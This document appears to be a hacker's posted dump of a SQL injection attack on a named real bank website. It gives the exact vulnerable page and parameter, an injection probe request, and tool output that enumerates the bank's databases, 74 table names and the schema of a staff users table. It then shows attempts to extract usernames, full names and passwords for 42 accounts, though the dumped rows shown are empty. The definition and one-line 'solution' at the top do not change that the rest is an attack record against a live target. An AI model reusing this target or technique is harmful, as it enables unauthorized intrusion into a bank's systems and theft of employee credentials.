- [*] SQL Injection:
- SQL Injection (SQLI) is a code injection technique that exploits a security vulnerability occurring in the database layer of a web application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and is thereby unexpectedly executed.
- solution: Sanitize all user-supplied data before using it as part of database queries.
- database: MySQL
- request:
- GET http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID='%60%22XrojS HTTP/1.1
- [*]Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
- available databases [2]:
- [*] information_schema
- [*] islamidb
- Database: islamidb
- [74 tables]
- +--------------------------+
- | annualreport |
- | ar_cat |
- | area |
- | articles |
- | atm |
- | atm_area |
- | atm_location |
- | audit_committee |
- | board_of_directors |
- | books |
- | branchdtls |
- | branches |
- | chairman_corner |
- | charge_commision |
- | corporate_info |
- | currencyrate |
- | currencyrate0 |
- | deposit_scheme |
- | deposit_scheme_info |
- | dept |
- | disclosure |
- | district |
- | download |
- | dynamicsections |
- | email |
- | eventdetails |
- | eventdetails_11 |
- | eventdetails_111 |
- | events |
- | executive_committee |
- | feb_aof_info |
- | feb_crsp_info |
- | feb_csc_info |
- | feb_nrb_info |
- | feb_rema_info |
- | feb_repa_info |
- | fex_graph |
- | interview |
- | investment |
- | jobcategory |
- | jobdetails |
- | keypersonal |
- | link |
- | link_cat |
- | management |
- | managementdetails |
- | manager_info |
- | md_corner |
- | md_news |
- | md_publication |
- | news |
- | notice |
- | orderby |
- | orderplacement |
- | paidup_capital |
- | personnel |
- | photo_album |
- | price_sensative_headline |
- | privilege |
- | profit_rate |
- | publication |
- | qryjobs |
- | rds_perform_details |
- | rds_perform_heading |
- | shariahcouncil |
- | shariahdetails |
- | sme_info |
- | sme_prd_info |
- | sme_zone |
- | sponsors |
- | sysvalues |
- | userrights |
- | users |
- | video |
- +--------------------------+
- Database: islamidb
- Table: users
- [13 columns]
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | Address | varchar(50) |
- | BranchName | varchar(50) |
- | Depertment | varchar(50) |
- | Designation | varchar(50) |
- | Email | varchar(50) |
- | FullName | varchar(50) |
- | IsActive | tinyint(4) |
- | Mobile | varchar(50) |
- | Password | varchar(255) |
- | Phone | varchar(50) |
- | UserID | int(11) |
- | UserName | varchar(50) |
- | UserType | char(1) |
- +-------------+--------------+
- Database: islamidb
- Table: users
- [42 entries]
- +------------------+
- | UserName |
- +------------------+
- +------------------+
- Database: islamidb
- Table: users
- [42 entries]
- +-------------------------------+
- | FullName |
- +-------------------------------+
- +-------------------------------+
- Database: islamidb
- Table: users
- [42 entries]
- +----------------------------------+
- | Password |
- +----------------------------------+
- +----------------------------------+